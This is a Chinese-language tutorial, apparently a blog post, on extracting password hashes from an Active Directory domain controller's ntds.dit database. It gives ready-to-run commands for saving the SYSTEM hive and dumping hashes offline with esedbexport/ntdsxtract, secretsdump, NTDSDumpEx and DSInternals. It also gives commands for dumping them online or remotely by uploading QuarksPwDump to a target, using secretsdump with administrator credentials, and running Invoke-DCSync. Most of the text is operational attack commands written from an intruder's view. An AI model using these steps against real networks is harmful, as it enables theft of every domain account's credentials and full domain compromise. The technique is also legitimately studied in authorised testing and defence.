域控安全：读取ntds.dit文件中的hash值

多种方式离线读取ntds.dit文件中的hash值

多种方式在线读取ntds.dit文件中的hash值

多种方式离线读取ntds.dit文件中的hash值

离线一般需要两步：

1、将远端域控的ntds.dit下载到本地，

2、然后利用再在本地进行。

注意：因为 system.hive 里存放着 ntds.dit 的秘钥，所以需要转储 system.hive ，不然没法查看ntds.dit 里内容

命令如下：

reg save hklm\system c:\system.hive

一.esedbexport：kali

1.kali安装

​
apt-get install autoconf automake autopoint libtool pkg-config

wget https://github.com/libyal/libesedb/releases/download/20210424/libesedbexperimental-20210424.tar.gz

tar zxvf libesedb-experimental-20210424.tar.gz

cd libesedb-20210424

./configure

make

make install

ldconfig

​

装好以后会有一个新的文件夹

2.将ntds.dit文件复制到这个工具目录里面然后导出，两个重要的表为：datatable以及link_table，他们都会被存放在./ntds.dit.export/文件夹中

esedbexport -m tables ntds.dit

主要用这个

3、安装 ntdsxtract：这是一个取证工具

​
git clone GitHub - csababarta/ntdsxtract: Active Directory forensic framework

cd ntdsxtract

python2 setup.py build

python2 setup.py install

​

4、将 ntds.dit.export 和 SYSTEM 文件放入到 ntdsxtract 工具的文件夹中，然后导出哈希值，最后的结果将保存在 1.txt 里

python2 dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 output --syshive SYSTEM --passwordhasher --pwdformat ocl --ntoufile atout --lmoufile lmout | tee 1.txt

二.secretsdump

1.将 ntds.dit 和 SYSTEM 文件放入到 和secretsdump.exe 同级目录下

secretsdump.exe -system system.hive -ntds ntds.dit LOCAL

三.NTDSDump.exe

NTDSDumpEx.exe 可以进行导出哈希值的操作

NTDSDumpEx -d ntds.dit -s system.hive -o 1.txt

四.DSInternals

DSInternals是powershell脚本，可以离线读取ntds文件我们用powershell的管理员权限打开，找到目录，导入工具模块

安装DSInternals：

Install-Module DSInternals -Force

导出 hash，并保存在 txt 文件里

$key = Get-Bootkey -SystemHivePath 'system路径'Get-ADDBAccount -All -DBPath 'ntds路径' -Bootkey $key | Out-File output_hash.txt

多种方式在线读取ntds.dit文件中的hash值

在线的方式就是直接读取不需要在导出ntds文件,在域环境中，不要直接在线获取hash，特别是域环境比较大的时候，在线获取hash等待时时间较长，工具占用资源太多，容易造成域控服务器崩溃

一.Quarks PwDump:

1.上传工具到目标机器，使用工具先导出ntds文件，然后直接读取

shell QuarksPwDump.exe --dump-hash-domain --ntds-file ntds.dit

二.secretsdump

使用secretsdump直接读取,需要有高权限的票据，IPC，什么的，可以远程读取目标机器的hash，就是远程读取

可以离线读，远程读，还可以在线读

例如远程读取：secretsdump.exe hack/administrator:[email protected] -outputfile 1.txt

三.Invoke-DCSync:

Invoke-DCSyncs是powershell脚本可以在线读取内存中的用户hash

Import-Module .\Invoke-DCSync.ps1

Invoke-DCSync -PWDumpFormat